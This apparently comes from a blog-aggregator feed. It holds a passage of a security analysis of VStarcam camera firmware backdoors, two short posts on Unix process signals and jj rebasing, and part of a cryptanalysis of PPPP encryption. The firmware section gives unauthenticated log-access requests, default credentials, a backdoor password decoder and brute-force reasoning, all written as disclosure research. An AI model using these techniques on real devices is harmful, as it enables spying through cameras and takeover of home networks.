Both requests are performed over plain HTTP, and this is already the first issue. If an attacker can inject a manipulated response on the network that either the app or the device is connected to, they will be able to install a malicious update on the camera. The former is particularly problematic, as the camera owner may connect to an open WiFi or similarly untrusted network while out.
The last part of a firmware version is a build number which is ignored for the update requests. The first part is a vendor ID where only a few options seem relevant (I checked 10, 48 and 66). The rest of the version number can be easily enumerated. Many firmware branches don’t have an active update, and when they do some updates won’t download because the servers in question appear no longer operational. Still, I found 380 updates this way.
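The enumeration boils down to building and probing URLs like this (a sketch; the 1–255 ranges for the middle version parts are my assumption, and no actual requests are made here):

```python
def update_check_url(vendor, model, branch, build, lang="EN"):
    # Build the update-check URL described above. The version format is
    # vendor.model.branch.build; the build number is ignored by the
    # server, so any value works.
    version = f"{vendor}.{model}.{branch}.{build}"
    return f"http://api4.eye4.cn:808/firmware/{version}/{lang}"

# Enumerate candidate versions for the three relevant vendor IDs.
# The 1-255 ranges for the middle parts are assumed, not documented.
candidates = [
    update_check_url(vendor, model, branch, 1)
    for vendor in (10, 48, 66)
    for model in range(1, 256)
    for branch in range(1, 256)
]
print(len(candidates))  # 3 * 255 * 255 = 195075
```
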
I managed to unpack all but one of these updates. Firmware version 10.1.110.2 wasn’t for a camera but rather some device with an HDMI connector and without any P2P functionality – probably a Network Video Recorder (NVR). Firmware version 10.121.160.42 wasn’t using PPPP but something called NHEP2P and an entirely different application-level protocol. Ten updates weren’t updating the camera application but only the base system. This left 367 firmware versions for this investigation.
Caveats of this survey
I do not own any VStarcam hardware, nor would it be feasible to investigate hundreds of different firmware versions with real hardware. The results of this article are based solely on reverse engineering, emulation, and automated analysis via running Ghidra in headless mode. While I can easily emulate a PPPP server, doing the same for the VStarcam cloud infrastructure isn’t possible – I simply don’t know how it behaves. Similarly, the firmware’s interaction with hardware had to be left out of the emulation. While I’m still quite confident in my results, these limitations could introduce errors.
More importantly, there are only so many firmware versions that I could check manually. Most of them were checked automatically, and I typically only looked at a few lines of decompiled code that my scripts extracted. There is potential for false negatives here; I expect that there are more issues with VStarcam firmware than what’s listed here.
VStarcam’s authentication approach
When an app communicates with a camera, it sends commands like GET /check_user.cgi?loginuse=admin&loginpas=888888&user=admin&pwd=888888. Despite the looks of it, these aren’t HTTP requests passed on to a web server. Instead, the firmware handles these in the function P2pCgiParamFunction, which doesn’t even attempt to parse the request. The processing code looks for substrings like check_user.cgi to identify the command (yes, better not set check_user.cgi as your access password). Parameter extraction works via similar substring matching.
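A toy reimplementation of that dispatch shows the pitfall (my own sketch – the command list and helper names are made up, only the substring approach mirrors the firmware):

```python
COMMANDS = ["check_user.cgi", "get_online_log.cgi", "clear_log.cgi"]

def identify_command(request):
    # Mimic the described dispatch: no parsing, just substring search.
    for cmd in COMMANDS:
        if cmd in request:
            return cmd
    return None

def get_param(request, name):
    # Parameter extraction via substring matching, as in the firmware.
    marker = name + "="
    pos = request.find(marker)
    if pos < 0:
        return None
    rest = request[pos + len(marker):]
    end = rest.find("&")
    return rest if end < 0 else rest[:end]

# A well-formed request is identified correctly...
print(identify_command("GET /get_online_log.cgi?enable=1"))
# ...but a password containing a command name derails the dispatch
# (set_params.cgi is a hypothetical endpoint for illustration):
print(identify_command("GET /set_params.cgi?loginuse=admin&loginpas=check_user.cgi"))
```
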
It’s worth noting that these cameras have a very peculiar authentication system which VStarcam calls “dual authentication.” Here is how the Eye4 application describes it:
The dual authentication mechanism is a measure to upgrade the whole system security
- The device will double check the identity of the visitor and does not support the old version of app.
- Considering the security risk of possible leakage, the plaintext password mode of the device was turned off and ciphertext access was used.
- After the device is added for the first time, it will not be allowed to be added for a second time, and it will be shared by the person who has added it.
I’m not saying that this description is utter bullshit but there is a considerable mismatch with the reality that I can observe. The VStarcam firmware cannot accept anything other than plaintext passwords. Newer firmware versions employ obfuscation on the PPPP-level but this hardly deserves the name “ciphertext”.
What I can see is: once a device is enrolled into dual authentication, the authentication is handled by function GetUserPri_doubleVerify rather than GetUserPri. There isn’t a big difference between the two: both will try the credentials from the loginuse/loginpas parameters and fall back to the user/pwd credentials pair. Function GetUserPri_doubleVerify merely checks a different password.
From the applications I get the impression that the dual authentication password is automatically generated and probably not even shared with the user but stored in their cloud account. This is an improvement over the regular password that defaults to 888888 and allowed these cameras to be enrolled into a botnet. But it’s still a plaintext password used for authentication.
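Based on that description, the credential check can be sketched roughly like this (a simplification of my own; the username is fixed to admin and all parameter handling is omitted):

```python
def get_user_pri(params, stored_password, double_verify_password=None):
    # Sketch of the described behavior of GetUserPri and
    # GetUserPri_doubleVerify: try the loginuse/loginpas pair first,
    # then fall back to user/pwd. The only difference between the two
    # functions is which stored password is compared against.
    expected = double_verify_password or stored_password
    for user_key, pass_key in (("loginuse", "loginpas"), ("user", "pwd")):
        if params.get(user_key) == "admin" and params.get(pass_key) == expected:
            return True
    return False

# The shipped default credentials, admin / 888888:
print(get_user_pri({"user": "admin", "pwd": "888888"}, "888888"))  # True
```
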
There is a second aspect to dual authentication. When dual authentication is used, the app is supposed to make a second authentication call to eye4_authentication.cgi. The loginAccount and loginToken parameters here appear to belong to the user’s cloud account, apparently meant to make sure that only the right user can access a device.
Yet in many firmware versions I’ve seen the eye4_authentication.cgi request always succeeds. The function meant to perform a web request is simply hardcoded to return the success code 200. Other firmware versions actually make a request to https://verification.eye4.cn, yet this server also seems to produce a 200 response regardless of what parameters I try. It seems that VStarcam never made this feature work the way they intended it.
None of this stopped VStarcam from boasting on their website merely a year ago:
You can certainly count on anything saying “financial grade encryption” being bullshit. I have no idea where AES comes into the picture here, I haven’t seen it being used anywhere. Maybe it’s their way of saying “we use TLS when connecting to our cloud infrastructure.”
Endpoint protection
A reasonable approach to authentication is: authentication is required before any requests unrelated to authentication can be made. This is not the approach taken by VStarcam firmware. Instead, some firmware versions decide for each endpoint individually whether authentication is necessary. Other versions put a bunch of endpoints outside of the code enforcing authentication.
The calls explicitly excluded from authentication differ by firmware version but are for example: get_online_log.cgi, show_prodhwfg.cgi, ircut_test.cgi, clear_log.cgi, alexa_ctrl.cgi, server_auth.cgi. For most of these it isn’t obvious why they should be accessible to unauthenticated users. But get_online_log.cgi caught my attention in particular.
Unauthenticated log access
So a request like GET /get_online_log.cgi?enable=1 can be sent to a camera without any authentication. This isn’t a request that any of the VStarcam apps seem to support – what does it do?
Despite the name this isn’t a download request; it rather sets a flag for the current connection. The logic behind this involves many moving parts including a Linux kernel module, but the essence is this: whenever the application logs something via the LogSystem_WriteLog function, it won’t merely print the message to stderr and write it to the log file on the SD card but will also send it to any connection that has this flag set.
What does the application log? Lots and lots of stuff. On average, VStarcam firmware has around 1500 such logging calls. For example, it could log security tokens:
LogSystem_WriteLog("qiniu.c", "upload_qiniu", 497, 0, "upload_qiniu*** filename = %s, fileid = %s, uptoken = %s\n", …);
LogSystem_WriteLog("pushservice.c", "parsePushServerRequest_cjson", 5281, 1, "address=%s token =%s master= %d timestamp = %d", …);
LogSystem_WriteLog("queue.c", "CloudUp_Manage_Pth", 347, 2, "token=%s", …);

It could log cloud server responses:

LogSystem_WriteLog("pushservice.c", "curlPostMqttAuthCb", 4407, 3, "\n\nrspBuf = %s\n", …);
LogSystem_WriteLog("post/postFileToCloud.c", "curl_post_file_cb", 74, 0, "\n\nrspBuf = %s\n", …);
LogSystem_WriteLog("pushserver.c", "curl_Eye4Authentication_write_data_cb", 2822, 0, "rspBuf = %s", …);

And of course it will log the requests coming in via PPPP:

LogSystem_WriteLog("vstcp2pcmd.c", "P2pCgiParamFunction", 633, 0, "sit %d, pcmd: %s", …);

Reminder: these requests contain the authentication password as a parameter. So an attacker can connect to a vulnerable device, request logs and wait for the legitimate device owner to connect. Once they do, their password will show up in the logs – voila, the attacker has access now.
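To illustrate how little work this leaves for the attacker, here is a sketch (my own code) that pulls the password parameter out of such a logged request:

```python
import re

def password_from_log(line):
    # Extract the loginpas parameter from a logged request, if present.
    match = re.search(r"loginpas=([^&\s]+)", line)
    return match.group(1) if match else None

log_line = ("sit 0, pcmd: GET /check_user.cgi?loginuse=admin"
            "&loginpas=hunter2&user=admin&pwd=hunter2")
print(password_from_log(log_line))  # hunter2
```
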
VStarcam appears to be at least somewhat aware of this issue because some firmware versions contain code “censoring” password parameters prior to logging:
memcpy(pcmd, request, sizeof(pcmd));
char* pos = strstr(pcmd, "loginuse");
if (pos)
    *pos = 0;
LogSystem_WriteLog("vstcp2pcmd.c", "P2pCgiParamFunction", 633, 0, "sit %d, pcmd: %s", sit, pcmd);

But that’s only the beginning of the story of course.
Explicit password leaking via logs
In addition to the logging calls where the password leaks as a (possibly unintended) side-effect, some logging calls are specifically designed to write the device password to the log. For example, the function GetUserPri, meant to handle authentication when dual authentication isn’t enabled, will often do something like this on a failed login attempt:
LogSystem_WriteLog("sysparamapp.c", "GetUserPri", 177, 0, "loginuse=%s&loginpas=%s&user=admin&pwd=888888&", gUser, gPassword);These aren’t the parameters of a received login attempt but rather what the parameters should look like for the request to succeed. And if the attacker enabled log access for their connection they will get the device credentials handed on a silver platter – without even having to wait for the device owner to connect.
If dual authentication is enabled, function GetUserPri_doubleVerify often contains a similar call:
LogSystem_WriteLog("web.c", "GetUserPri_doubleVerify", 536, 0, "pri[%d] system OwnerPwd[%s] app Pwd[%s]", pri, gOwnerPassword, gAppPassword);

Log uploading
What got me confused at first were the firmware versions that would log the “correct” password on failed authentication attempts but lacked the capability for unauthenticated log access. When I looked closer I found the function DoSendLogToNodeServer. The firmware receives a “node configuration” from a server which includes a “push IP” and the corresponding port number. It then opens a persistent TCP connection to that address (unencrypted of course), so that DoSendLogToNodeServer can send messages to it.
Despite the name this function doesn’t upload all of the application logs. There are only three to four DoSendLogToNodeServer calls in the firmware versions I looked at, and two are invariably found in function P2pCgiParamFunction, in code running on the first failed authentication attempt:
sprintf(buffer,"password error [doublePwd][%s], [PassWd][%s]", gOwnerPassword, gPassword);
DoSendLogToNodeServer(request);
DoSendLogToNodeServer(buffer);

This is sending both the failed authentication request and the correct passwords to a VStarcam server. So while the password isn’t being leaked here to everybody who knows how to ask, it’s still being leaked to VStarcam themselves. And anybody who is eavesdropping on the device’s traffic of course.
A few firmware versions have log upload functionality in a function called startUploadLogToServer; here all of the logging output really is uploaded to the server. This one isn’t called unconditionally however, but rather enabled by the setLogUploadEnable.cgi endpoint. An endpoint which, you guessed it, can be accessed without authentication. But at least these firmware versions don’t seem to have any explicit password logging, only the “regular” logging of requests.
Password-leaking backdoor
With some considerable effort all of the above could be explained as debugging functionality which was mistakenly shipped to production. VStarcam wouldn’t be the first company to fail to realize that functionality labeled “for debugging purposes only” will still be abused if released with the production build of their software. But I found yet another password leak which can only be described as a backdoor.
At some point VStarcam introduced a second version of their get_online_log.cgi API. When that second version is requested the device will respond with something like:
result=0;
index=12345678;
str=abababababab;

The result=0 part is typical and indicates that authentication (or lack thereof in this case) was successful. The other two values are unusual, and eventually I decided to check what they were about. Turned out, str is a hex-encoded version of the device password after it was XOR’ed with a random byte. And index is an obfuscated representation of that byte.
I can only explain it like this: somebody at VStarcam thought that leaking passwords via log output was too obvious, people might notice. So they decided to expose the device password in a more subtle way, one that only they knew how to decode (unless somebody notices this functionality and spends two minutes studying it in the firmware).
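Assuming the XOR byte has been recovered from index (I’m treating it as already known here, since the exact obfuscation isn’t shown), decoding str takes a couple of lines:

```python
def decode_password(xor_byte, hex_str):
    # Reverse the get_online_log.cgi v2 obfuscation: hex-decode the
    # string and XOR every byte with the recovered random byte.
    return bytes(b ^ xor_byte for b in bytes.fromhex(hex_str)).decode()

# Round trip for demonstration: obfuscate the default password "888888"
# with an arbitrary byte, then recover it.
key = 0xAB
obfuscated = bytes(ord(c) ^ key for c in "888888").hex()
print(decode_password(key, obfuscated))  # 888888
```
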
Mind you, even though this is clearly a backdoor I’m still not ruling out incompetence. Maybe VStarcam made a large enough mess with their dual authentication that their customer support needs to recover device access on a regular basis. However, they do have device reset functionality that should normally be used for this scenario.
In the end, for their customers it doesn’t matter what the intention was. The result is a device that cannot be trusted with protecting access. For a security camera this is an unforgivable flaw.
Establishing a timeline
Now we are coming to the tough questions. Why do some firmware versions have this backdoor functionality while others don’t? When was this introduced? In what order? What is the current state of affairs?
You might think that after compiling the data on 367 firmware versions the answers would be obvious. But the data is so inconsistent that any conclusions are really difficult. Thing is, we aren’t dealing with a single evolving codebase here. We aren’t even dealing with two codebases or a dozen of them. 367 firmware versions are 367 different codebases. These codebases are related, they share some code here and there, but they are all being developed independently.
I’ve seen this development model before. What VStarcam appears to be doing is: for every new camera model they take some existing firmware and fork it. They adjust that firmware for the new hardware, they probably add new features as well. None of this work makes it into the original firmware unless it is explicitly backported. And since VStarcam is maintaining hundreds of firmware variants, the older ones are usually only receiving maintenance changes if any at all.
To make this mess complete, VStarcam’s firmware version numbers don’t make any sense at all. And I don’t mean the fact that VStarcam releases the same camera under 30 different model names, so there is no chance of figuring out the model to firmware version mapping. It’s also the firmware version numbers themselves.
As I’ve already mentioned, the last part of the firmware version is the build number, increased with each release. The first part is the vendor ID: firmware versions starting with 48 are VStarcam’s global releases whereas 66 is reserved for their Russian distributor (or rather was, I think). Current VStarcam firmware is usually released with vendor ID 10 however, standing for… who knows, VeePai maybe? This leaves the two version parts in between, and I couldn’t find any logic here whatsoever. Like, firmware versions sharing the third part of the version number would sometimes be closely related, but only sometimes. At the same time the second part of the version number is supposed to represent the camera model, but that’s clearly not always correct either.
I ended up extracting all the logging calls from all the firmware versions and using that data to calculate a distance between every firmware version pair. I then fed this data into GraphViz and asked it to arrange the graph for me. It gave me the VStarcam spiral galaxy:
Click the image above to see the larger and slightly interactive version (it shows additional information when the mouse pointer is at a graph node). The green nodes are the ones that don’t allow access to device logs. Yellow are the ones providing unauthenticated log access, always logging incoming requests including their password parameters. The orange ones have additional logging that exposes the correct password on failed authentication attempts – or they call DoSendLogToNodeServer function to send the correct password to a VStarcam server. The red ones have the backdoor in the get_online_log.cgi API leaking passwords. Finally pink are the ones which pretend to improve things by censoring parameters of logged requests – yet all of these without exception leak the password via the backdoor in the get_online_log.cgi API.
Note: Firmware version 10.165.19.37 isn’t present in the graph because it is somehow based on an entirely different codebase with no relation to the others. It would be red in the graph however, as the backdoor has been implemented here as well.
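The distance metric behind the graph can be sketched as a Jaccard distance over the sets of extracted logging calls (an illustration of the idea rather than the exact script used):

```python
def jaccard_distance(calls_a, calls_b):
    # Distance between two firmware versions based on the overlap of
    # their sets of logging calls: 0.0 = identical, 1.0 = disjoint.
    a, b = set(calls_a), set(calls_b)
    if not a and not b:
        return 0.0
    return 1.0 - len(a & b) / len(a | b)

# Logging calls identified by (file, function, line), as seen earlier:
fw1 = {("sysparamapp.c", "GetUserPri", 177),
       ("vstcp2pcmd.c", "P2pCgiParamFunction", 633)}
fw2 = {("sysparamapp.c", "GetUserPri", 177),
       ("web.c", "GetUserPri_doubleVerify", 536)}
print(jaccard_distance(fw1, fw2))  # 1 shared call out of 3 -> ~0.667
```
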
Not only does this graph show the firmware versions as clusters, it’s also possible to approximately identify the direction of time for each cluster. Let’s add cluster names and time arrows to the image:
Of course this isn’t a perfect representation of the original data, and I wasn’t sure whether it could be trusted. Are these clusters real or merely an artifact produced by the graph algorithm? I verified things manually and could confirm that the clusters are in fact distinctly different on the technical level, particularly when considering the update format:
- Clusters A and B represent firmware for ARM processors. I’m unsure what caused the gap between the two clusters but cluster A contains firmware from years 2019 and 2020, cluster B on the other hand is mostly years 2021 and 2022. Development pretty much stopped here, the only exception being the four red firmware versions which are recent. Updates use the “classic” ZIP format here.
- Cluster C covers years 2019 to 2022. Quite remarkably, in these years the firmware from this cluster moved from ARM processors and LiteOS to MIPS processors and Linux. The original updates based on VStarcam Pack System were replaced by the VeePai-branded ZIP format and later by Ingenic updates with LZO compression. All that happened without introducing significant changes to the code but rather via incremental development.
- Cluster D contains firmware for the MIPS processors from years 2022 and 2023. Updates are using the VeePai-branded ZIP format.
- Cluster E formed around 2023; there is still some development being done here. It uses MIPS processors like cluster D, yet the update format is different (what I called VeePai updates in my previous blog post).
- Cluster F has seen continuous development since approximately 2022; this is firmware based on Ingenic’s MIPS hardware and the most active branch of VStarcam development. Originally the VeePai-branded ZIP format was used for updates; this was later transitioned to Ingenic updates with LZO compression and finally to the same format with jzlcma compression.
With the firmware versions ordered like this I could finally make some conclusions about the introduction of the problematic features:
- Unauthenticated logs access via the get_online_log.cgi API was introduced in cluster B around 2022.
- Logging the correct password on failed attempts was introduced independently in cluster C. In fact, some firmware versions had this in 2020 already.
- In 2021 cluster C also added the innovation that was the DoSendLogToNodeServer function, sending the correct password to a VStarcam server on the first failed login attempt.
- Unauthenticated logs access and logging the correct password appear to have been combined in cluster D in 2023.
- Cluster E initially also adopted the approach of exposing log access and logging device password on failed attempts, adding the sending of the correct password to a VStarcam server to the mix. However, starting in 2024 firmware versions with the get_online_log.cgi backdoor start popping up here, and these have all other password leaks removed. These even censor passwords in logged request parameters. Either there were security considerations at play or the other ways to expose the password were considered unnecessary at this point and too obvious.
- Cluster F also introduced logging device password on failed attempts around 2023. This cluster appears to be the origin of the get_online_log.cgi backdoor, it was introduced here around 2024. Unlike with cluster E this backdoor didn’t replace the existing password leaks here but only complemented them. In fact, while cluster F was initially “censoring” parameters so that logged requests wouldn’t leak passwords, this measure appears to have been dropped later in 2024. Current cluster F firmware tends to have all the issues described in this post simultaneously. Whatever security considerations may have driven the changes in cluster E, the people in charge of cluster F clearly disagreed.
The impact
So, how bad is it? Knowing the access password allows access to the camera’s main functionality: audio and video recordings. But these cameras have been known for vulnerabilities allowing execution of arbitrary commands. Also, newer cameras have an API that will start a telnet server with hardcoded and widely known administrator credentials (older cameras had this telnet server start by default). So we have to assume that a compromised camera could become part of a botnet or be used as a starting point for attacks against a network.
But this requires accessing the camera first, and most VStarcam cameras won’t be exposed to the internet directly. They will only be reachable via the PPPP protocol. And for that the attackers would need to know the device ID. How would they get it?
There are a number of ways, most of which I’ve already discussed before. For example, anybody who was briefly connected to your network could have collected device IDs of your cameras. The script to do that won’t currently work with newer VStarcam cameras because these obfuscate the traffic on the PPPP level, but the necessary adjustments aren’t exactly complicated.
PPPP networks still support “supernodes,” devices that help route traffic. Back in 2019 Paul Marrapese abused that functionality to register a rogue supernode and collect device IDs en masse. There is no indication that this trick stopped working, and the VStarcam networks are likely susceptible as well.
Users also tend to leak their device IDs themselves. They will post screenshots or videos of the app’s user interface. At first glance this is less problematic with the O-KAM Pro app because this one will display only a vendor-specific device ID (it looks similar to a PPPP device ID but has seven digits and only four letters in the verification code). That is, until you notice that the app uses a public web API to translate vendor-specific device IDs into PPPP device IDs.
Anybody who can intercept some PPPP traffic can extract the device IDs from it. Even when VStarcam networks obfuscate the traffic rather than using plaintext transmission – the static keys are well known, removing the obfuscation isn’t hard.
And finally, simply guessing device IDs is still possible. With only 5 million possible verification codes for each device ID and servers not implementing rate limiting, bruteforce attacks are quite realistic.
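To put those numbers into perspective, a back-of-the-envelope estimate (the guess rate is a made-up assumption, not a measured figure):

```python
verification_codes = 5_000_000
guesses_per_second = 1_000  # hypothetical rate, given no server-side rate limiting

# Time to cover the entire verification code space for one device ID:
seconds = verification_codes / guesses_per_second
print(f"{seconds / 3600:.1f} hours to exhaust the space")  # 1.4 hours
```
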
Let’s not forget the elephant in the room however: VStarcam themselves know all the device IDs of course. Not just that, they know which devices are active and where. With a password they can access the cameras of interest to them (or their government) anytime.
Coordinated disclosure attempt
Given the intentional nature of these issues, I was unsure how to deal with this. I mean, what’s the point of reporting vulnerabilities to VStarcam that they are clearly aware of? In the end I decided to give them a chance to address the issues before they become public knowledge.
However, all I found was VStarcam boasting about their ISO 27001:2022 compliance. My understanding is that this requires them to have a dedicated person responsible for vulnerability management, but they are not obliged to list any security contact that can be reached from outside the company – and so they don’t. I ended up emailing all company addresses I could find, asking whether there is any way to report security issues to them.
I haven’t received any response, an experience that, as I understand it, other people have already had with VStarcam. So I went with my initial publication schedule rather than waiting 90 days as I normally would.
Recommendations
Whatever motives VStarcam had to backdoor their cameras, the consequence for their customers is: these cameras cannot be trusted. Their access protection should be considered compromised. Even with firmware versions shown as green on my map, there is no guarantee that I haven’t missed something or that they will still be green after the next update.
If you want to keep using a VStarcam camera, the only safe way to do so is to disconnect it from the internet. It doesn’t have to be disconnected physically; internet routers often have a way to prohibit internet traffic to and from particular devices. My router, for example, has this feature under parental controls.
Of course this will mean that you will only be able to control your camera while connected to the same network. It might be possible to explicitly configure port forwarding for the camera’s RTSP port, allowing you to access at least the video stream from outside. Just make sure that your RTSP password isn’t known to VStarcam.
Olivier Mehani: Pausing a background process
It’s common, in a Unix shell, to pause a foreground process with Ctrl+Z. However, today I needed to pause a _background_ process.
tl;dr: SIGTSTP and SIGCONT
The context was a queue processor spinning too fast, and preventing us from dequeuing unwanted messages.
Unsurprisingly, there are standard POSIX signals to pause and resume a target PID.
So we just need to grab the PID, and kill away.
$ kill -TSTP ${PID}
[... do what's needed ...]
$ kill -TCONT ${PID}

EDIT: because some curious people asked the question I didn’t: TSTP stands for “Terminal Stop”, which is apparently exactly what Ctrl+Z from a terminal sends to the foreground process.
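The same stop/continue dance can also be driven programmatically. A minimal Python sketch (POSIX only; the forked busy child is just a stand-in for the queue processor) that suspends a background process and then resumes it:

```python
import os
import signal
import time

# Fork a child process that just spins; the parent will control it.
pid = os.fork()
if pid == 0:
    while True:
        time.sleep(0.1)

os.kill(pid, signal.SIGTSTP)             # equivalent of `kill -TSTP ${PID}`
_, status = os.waitpid(pid, os.WUNTRACED)
stopped = os.WIFSTOPPED(status)          # the child is now suspended

os.kill(pid, signal.SIGCONT)             # equivalent of `kill -TCONT ${PID}`
os.kill(pid, signal.SIGTERM)             # clean up the example child
os.waitpid(pid, 0)
print(stopped)
```

`os.waitpid` with `os.WUNTRACED` is what lets the parent confirm the child actually entered the stopped state before resuming it.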
The post Pausing a background process first appeared on Narf.
Jonathan Almeida: Rebase all WIPs to the new main
A small pet-peeve with fetching the latest main on jujutsu is that I like to move all my WIP patches to the new one. That's also nice because jj doesn't make me fix the conflicts immediately!
The solution from a co-worker (kudos to skippyhammond!) is to query all immediate descendants of the previous main after the fetch.
jj git fetch
# assuming 'z' is the rev-id of the previous main
jj rebase -s "mutable()&z+" -d main

I haven't learnt how to make aliases accept params yet, so this will have to do for now.
Update: After a bit of searching, it seems that today this is only possible by wrapping it in a shell script. Based on the examples in the jj documentation an alias would look like this:
[aliases]
# Update all revs to the latest main; point to the previous one.
hoist = ["util", "exec", "--", "bash", "-c", """
set -euo pipefail
jj rebase -s "mutable()&$1+" -d "main"
""", ""]

Wladimir Palant: Analysis of PPPP “encryption”
My first article on the PPPP protocol already said everything there was to say about PPPP “encryption”:
- Keys are static and usually trivial to extract from the app.
- No matter how long the original key, it is mapped to an effective key that’s merely four bytes long.
- The “encryption” is extremely susceptible to known-plaintext attacks, usually allowing reconstruction of the effective key from a single encrypted packet.
So this thing is completely broken, why look any further? There is at least one situation where you don’t know the app being used, so you cannot extract the key, and you don’t have any traffic to analyze either: when you are trying to scan your local network for potential hidden cameras.
This script will currently only work for cameras using plaintext communication. Other cameras expect a properly encrypted “LAN search” packet and will ignore everything else. How can this be solved without listing all possible keys in the script? By sending all possible ciphertexts of course!
TL;DR: What would be completely ridiculous with any reasonable protocol turned out to be quite possible with PPPP. There are at most 157,092 ways in which a “LAN search” packet can be encrypted. I’ve opened a pull request to have the PPPP device detection script adjusted.
Note: Cryptanalysis isn’t my topic, I am by no means an expert here. These issues are simply too obvious.
Contents
- Mapping keys to effective keys
- Redundancies within the effective key
- ASCII to the rescue
- How large is n?
- How many ciphertexts is that?
- Understanding the response
Mapping keys to effective keys
The key which is specified as part of the app’s “init string” is not being used for encryption directly. Nor is it being fed into any of the established key stretching algorithms. Instead, a key represented by the byte sequence $b_1, b_2, \ldots, b_n$ is mapped to four bytes $k_1, k_2, k_3, k_4$ that become the effective key. These bytes are calculated as follows ($\lfloor x \rfloor$ means rounding down, $\otimes$ stands for the bitwise XOR operation):
$$
\begin{aligned}
k_1 &= (b_1 + b_2 + \ldots + b_n) \mod 256\\
k_2 &= (-b_1 + -b_2 + \ldots + -b_n) \mod 256\\
k_3 &= (\lfloor b_1 \div 3 \rfloor + \lfloor b_2 \div 3 \rfloor + \ldots + \lfloor b_n \div 3 \rfloor) \mod 256\\
k_4 &= b_1 \otimes b_2 \otimes \ldots \otimes b_n
\end{aligned}
$$

In theory, a 4-byte effective key means $256^4 = 4{,}294{,}967{,}296$ possible values. But that would only be the case if these bytes were independent of each other.
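The mapping is easy to reproduce in a few lines of Python. This is a sketch based on the formulas above; the key b"example-key" is a made-up illustration, not a real app key:

```python
def effective_key(key: bytes) -> tuple[int, int, int, int]:
    """Map a PPPP key to the four bytes of its effective key."""
    k1 = sum(key) % 256
    k2 = -sum(key) % 256                  # Python's % keeps this in 0..255
    k3 = sum(b // 3 for b in key) % 256
    k4 = 0
    for b in key:
        k4 ^= b                           # running XOR over all key bytes
    return k1, k2, k3, k4

print(effective_key(b"example-key"))
```

However long the input key, everything an attacker needs to recover is this four-byte tuple.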
Redundancies within the effective key
Of course the bytes of the effective key are not independent. This is most obvious with $k_2$, which is completely determined by $k_1$:
$$
\begin{aligned}
k_2 &= (-b_1 + -b_2 + \ldots + -b_n) \mod 256\\
&= -(b_1 + b_2 + \ldots + b_n) \mod 256\\
&= -k_1 \mod 256
\end{aligned}
$$

This means that we can ignore $k_2$, bringing the number of possible effective keys down to $256^3 = 16{,}777{,}216$.
Now let’s have a look at the relationship between $k_1$ and $k_4$. Addition and bitwise XOR are very similar operations; the latter merely ignores carry. This difference affects all bits of the result except the lowest one, where there is no carry to consider. This means that the lowest bits of $k_1$ and $k_4$ are always identical. So $k_4$ has only 128 possible values for any value of $k_1$, bringing the total number of effective keys down to $256 \cdot 256 \cdot 128 = 8{,}388{,}608$.
And that’s as far as we can get considering only redundancies. It can be shown that a key can be constructed resulting in any combination of $k_1$ and $k_3$ values. Similarly, it can be shown that any combination of $k_1$ and $k_4$ is possible as long as the lowest bit is identical.
ASCII to the rescue
But the keys we are dealing with here aren’t arbitrary bytes. They aren’t limited to alphanumeric characters, some keys also contain punctuation, but they are all invariably limited to the ASCII range. And that means that the highest bit is never set in any of the $b_i$ values.
Which in turn means that the highest bit is never set in $k_4$, due to the nature of the bitwise XOR operation. We can once again rule out half of the effective keys: for any given value of $k_1$ there are only 64 possible values of $k_4$. We now have $256 \cdot 256 \cdot 64 = 4{,}194{,}304$ possible effective keys.
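Both parity observations are easy to confirm empirically. A quick sketch that recomputes $k_1$ and $k_4$ for random printable-ASCII keys of up to 16 bytes and checks that their lowest bits agree and that $k_4$ stays below 128:

```python
import random

def claims_hold(trials: int = 10_000) -> bool:
    """Check: k1 and k4 share their lowest bit; k4's highest bit is clear."""
    rng = random.Random(0)                # fixed seed for reproducibility
    for _ in range(trials):
        # random printable-ASCII key, 1 to 16 bytes long
        key = bytes(rng.randrange(0x20, 0x7F) for _ in range(rng.randrange(1, 17)))
        k1 = sum(key) % 256
        k4 = 0
        for b in key:
            k4 ^= b
        if (k1 & 1) != (k4 & 1) or k4 >= 128:
            return False
    return True

print(claims_hold())
```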
How large is n?
Now let’s have a thorough look at how $k_3$ relates to $k_1$, ignoring the modulo operation at first. We are taking one third of each byte, rounding it down and summing that up. What if we were to sum up first and round down at the end, how would that relate? Well, it definitely cannot be smaller than rounding down in each step, so we have an upper bound here:
$$
\lfloor b_1 \div 3 \rfloor + \lfloor b_2 \div 3 \rfloor + \ldots + \lfloor b_n \div 3 \rfloor \leq \lfloor (b_1 + b_2 + \ldots + b_n) \div 3 \rfloor
$$

How much smaller can the left side get? Each time we round down this removes at most two thirds, and we do this $n$ times. So altogether these rounding operations reduce the result by at most $n \cdot 2 \div 3$. This gives us a lower bound:
$$
\lceil (b_1 + b_2 + \ldots + b_n - n \cdot 2) \div 3 \rceil \leq \lfloor b_1 \div 3 \rfloor + \lfloor b_2 \div 3 \rfloor + \ldots + \lfloor b_n \div 3 \rfloor
$$

If $n$ is arbitrary these bounds don’t help us at all. But $n$ isn’t arbitrary: the keys used for PPPP encryption tend to be fairly short. Let’s say that we are dealing with keys of length 16 at most, which is a safe bet. If we know the sum of the bytes, these bounds allow us to narrow down $k_3$ to $\lceil 16 \cdot 2 \div 3 \rceil = 11$ possible values.
But we don’t know the sum of bytes. What we have is $k_1$, which is that sum modulo 256; the sum is actually $i \cdot 256 + k_1$ where $i$ is some nonnegative integer. How large can $i$ get? Remembering that we are dealing with ASCII keys, each byte has at most the value 127. And we have at most 16 bytes. So the sum of bytes cannot be higher than $127 \cdot 16 = 2032$ (or 7F0 in hexadecimal). Consequently, $i$ is 7 at most.
Let’s write down the bounds for $k_3$ now:
$$
\lceil (i \cdot 256 + k_1 - n \cdot 2) \div 3 \rceil \leq j \cdot 256 + k_3 \leq \lfloor (i \cdot 256 + k_1) \div 3 \rfloor
$$

We have to consider this for eight possible values of $i$. Wait, do we really?
Once we move into modulo 256 space again, the $i \cdot 256 \div 3$ part of our bounds (the only part dependent on $i$) will assume the same value after every three $i$ values. So only three values of $i$ are really relevant, say 0, 1 and 2. Meaning that for each value of $k_1$ we have $3 \cdot 11 = 33$ possible values for $k_3$.
This gives us $256 \cdot 33 \cdot 64 = 540{,}672$ as the number of possible effective keys. My experiments with random keys indicate that this should be pretty much as far down as it goes. There may still be more edge conditions rendering some effective keys impossible, but if these exist their impact is insignificant.
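The 540,672 figure can be reproduced by enumerating, for every value of $k_1$, which $k_3$ values the bounds above permit (assuming the maximum key length of 16 bytes used throughout; the helper name is mine):

```python
import math

MAX_LEN = 16  # assumed maximum key length, as above

def possible_k3(k1: int) -> set[int]:
    """All k3 values compatible with a given k1 under the derived bounds."""
    values = set()
    for i in range(8):                         # byte sum = i*256 + k1, i <= 7
        s = i * 256 + k1
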